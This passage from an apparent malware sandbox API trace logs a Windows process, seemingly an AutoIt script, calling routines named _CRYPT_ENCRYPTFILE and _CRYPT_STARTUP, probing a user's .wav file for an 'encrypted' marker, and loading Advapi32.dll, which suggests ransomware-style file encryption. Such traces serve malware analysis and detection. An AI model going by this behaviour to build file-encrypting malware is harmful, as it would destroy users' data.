hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.265] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.265] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.265] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.265] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.265] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.265] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.266] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.266] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.266] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.266] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.266] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.266] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.267] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.267] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.267] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3f4aa0, ftCreationTime.dwHighDateTime=0x1d5c100, ftLastAccessTime.dwLowDateTime=0x75c598c0, ftLastAccessTime.dwHighDateTime=0x1d5bc05, ftLastWriteTime.dwLowDateTime=0x75c598c0, ftLastWriteTime.dwHighDateTime=0x1d5bc05, nFileSizeHigh=0x0, nFileSizeLow=0x14996, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ohsKY-A9exL.wav", cAlternateFileName="OHSKY-~1.WAV")) returned 0x7c20c0 [0038.267] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.267] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3f4aa0, ftCreationTime.dwHighDateTime=0x1d5c100, ftLastAccessTime.dwLowDateTime=0x75c598c0, ftLastAccessTime.dwHighDateTime=0x1d5bc05, ftLastWriteTime.dwLowDateTime=0x75c598c0, ftLastWriteTime.dwHighDateTime=0x1d5bc05, nFileSizeHigh=0x0, nFileSizeLow=0x14996, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ohsKY-A9exL.wav", cAlternateFileName="OHSKY-~1.WAV")) returned 0x7c20c0 [0038.267] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.267] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ohsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hsKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KY-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9exL.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.269] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.269] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.269] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.269] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.270] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.270] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.270] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.270] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.270] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.270] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3f4aa0, ftCreationTime.dwHighDateTime=0x1d5c100, ftLastAccessTime.dwLowDateTime=0x75c598c0, ftLastAccessTime.dwHighDateTime=0x1d5bc05, ftLastWriteTime.dwLowDateTime=0x75c598c0, ftLastWriteTime.dwHighDateTime=0x1d5bc05, nFileSizeHigh=0x0, nFileSizeLow=0x14996, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="ohsKY-A9exL.wav", cAlternateFileName="OHSKY-~1.WAV")) returned 0x7c2240 [0038.270] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.270] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.270] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.270] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.271] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.271] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.271] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.271] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.271] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.271] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, 